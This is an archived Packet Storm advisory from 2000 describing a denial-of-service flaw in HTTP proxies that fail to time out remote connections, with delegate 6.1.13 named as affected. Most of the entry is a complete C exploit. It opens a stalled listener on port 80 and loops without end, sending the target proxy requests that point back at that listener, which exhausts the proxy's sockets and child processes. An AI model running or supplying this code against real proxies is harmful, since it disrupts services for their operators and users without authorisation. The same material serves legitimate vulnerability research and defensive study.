proxy.dos

2000-08-02T00:00:00
ID PACKETSTORM:22131
Type packetstorm
Reporter Sectorx
Modified 2000-08-02T00:00:00

Description

                                        
                                            `HTTP Proxies Denial of Service  
by SectorX of XOR (http://xorteam.cjb.net)  
  
The theory  
==========  
While browsing through my own http proxy code, i noticed an interesting  
coding mistake - the proxy did not perfrom timeout checking on the remote host  
the user was connecting to. since every time a user requests a file the proxy  
spawns him a process, i figured this could be used for a nice fork() attack,  
or make the proxy run out of available sockets.  
  
I tested it against delegate 6.1.13, it created some system lag and then  
ran out of free sockets, and couldnt accept anymore connections.  
I _assume_ this makes alot of http proxies vulnerable, since this seems  
like a common mistake.  
  
Exploit  
=======  
This code acts as a webserver and a proxy client. it binds port 80 and sets  
listen() to keep ALOT of connections holding, then connects to the target  
proxy and starts spawning connections to its fake httpd, thus creating alot of  
stalled child processes.  
  
this was coded in a rush so dont mind its uglyness =p  
  
  
#include <stdio.h>  
#include <stdlib.h>  
#include <unistd.h>  
#include <sys/socket.h>  
#include <sys/types.h>  
#include <netinet/in.h>  
#include <stdarg.h>  
#include <time.h>  
#include <sys/time.h>  
  
int Connect(int ip, int port)  
{  
int fd;  
struct sockaddr_in tgt;  
  
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if (fd<0) return -1;  
memset(&tgt,0,sizeof(struct sockaddr_in));  
tgt.sin_port = htons(port);  
tgt.sin_family = AF_INET;  
tgt.sin_addr.s_addr = ip;  
if (connect(fd,(struct sockaddr*)&tgt,sizeof(struct sockaddr))<0) return -1;  
return fd;  
}  
  
int sprint(int fd, const char *str,...)  
{  
va_list args;  
char buf[4096];  
memset(&buf,0,sizeof(buf));  
va_start(args,str);  
vsnprintf(buf,sizeof(buf),str,args);  
return(write(fd,buf,strlen(buf)));  
}  
  
int main(int argc, char *argv[])  
{  
int fd;  
struct sockaddr_in box;  
  
fprintf(stderr, "Many http proxies denial of service (c) sectorx of xor [public]\n");  
if (argc < 3) {  
fprintf(stderr, "usage: %s <your ip> <proxy ip> [proxy port]\n",argv[0]);  
return;  
}  
  
fprintf(stderr,"Making a stall on port 80 ... ");  
fd = socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);  
if (fd<0) {  
perror("socket() ");  
return;  
}  
memset(&box,0,sizeof(struct sockaddr_in));  
box.sin_family = AF_INET;  
box.sin_addr.s_addr = INADDR_ANY;  
box.sin_port = htons(0x50);  
if (bind(fd,(struct sockaddr*)&box,sizeof(struct sockaddr))<0) {  
perror("bind()[80] ");  
return;  
}  
if (listen(fd,65535)<0) {  
perror("listen() ");  
return;  
}  
fprintf(stderr,"done!\n");  
fprintf(stderr,"Attacking proxy : ");  
for (;;) {  
int sock;  
  
sock = Connect(inet_addr(argv[2]),(argc>3)?(atoi(argv[3])):3128);  
if (sock<0) {  
perror("Connect() ");  
sleep(15);  
continue;  
}  
sprint(sock,"GET http://%s/ HTTP/1.0\n\n",argv[1]);  
fprintf(stderr, ".");  
}  
}  
`